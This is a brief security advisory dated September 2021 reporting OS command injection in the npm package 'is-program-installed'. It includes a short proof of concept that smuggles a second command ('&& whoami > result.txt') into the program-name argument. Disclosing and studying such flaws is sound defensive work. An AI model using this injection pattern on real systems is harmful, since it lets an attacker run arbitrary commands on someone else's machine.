OS Command Injection in zacanger/is-program-installed
Sep 12th 2021
There is an "OS Command Injection" vulnerability in the "is-program-installed" npm package. The package checks whether the program or binary whose name is passed as a parameter is installed on the computer. However, because the package does not properly validate the characters in the program name it receives as input, it is possible to run commands on the operating system.
Proof of Concept
// PoC.js
const isInstalled = require('is-program-installed');
console.log(isInstalled('powershell.exe && whoami > result.txt'));
// After running this program, a "result.txt" file will be created containing the output of the "whoami" command.
An attacker can run commands on the machine.